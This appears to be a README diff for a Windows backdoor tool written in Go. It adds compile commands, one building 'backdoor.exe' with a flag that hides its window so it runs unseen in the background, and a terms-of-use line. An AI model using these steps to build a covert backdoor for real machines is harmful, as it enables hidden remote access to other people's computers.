SaturnsVoid/Windows-Backdoor-AES/README.md

 Youtube: https://www.youtube.com/watch?v=y4eDgwFJkFY
 *Not much to see, just a peek at it.

+# Compile

+	* go build main.go
+	* go build -o backdoor.exe -ldflags "-H windowsgui" "client.go"

+The client will have no window and run in the background.

 # Terms of Use

 	* Do NOT use this on any computer you do not own, or are allowed to run this on.